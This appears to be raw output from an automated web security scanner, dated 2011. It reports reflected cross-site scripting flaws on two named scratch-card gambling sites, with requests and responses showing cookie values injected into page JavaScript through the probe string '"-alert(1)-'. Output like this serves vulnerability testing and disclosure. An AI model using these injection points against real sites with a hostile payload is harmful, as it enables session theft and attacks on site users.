HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/ Set-Cookie: BO=FM32f61"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:46 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72376 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM32f61"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Sitemap.aspx |
GET /Sitemap.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc088a" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72376 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc088a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: BO=FM2d468"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 109359 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM2d468"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2ffd5" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 109359 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2ffd5"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/ Set-Cookie: BO=FM68e0d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM68e0d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM526d6" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM526d6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FMff42d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMff42d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:29:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc5a85" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc5a85"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM351d1"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52554 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM351d1"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMf7ac4" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52554 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMf7ac4"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM675ff"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46188 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM675ff"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM31ad6" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46188 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM31ad6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FMcdb61"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45317 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMcdb61"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMcdccc" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45317 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMcdccc"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM4fb04"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44459 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM4fb04"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM239a6" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44459 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM239a6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FMf1a06"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56940 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMf1a06"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM67cd9" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56940 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM67cd9"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FMd323d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMd323d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMaba62" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53379 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMaba62"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM57bb5"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47645 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM57bb5"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
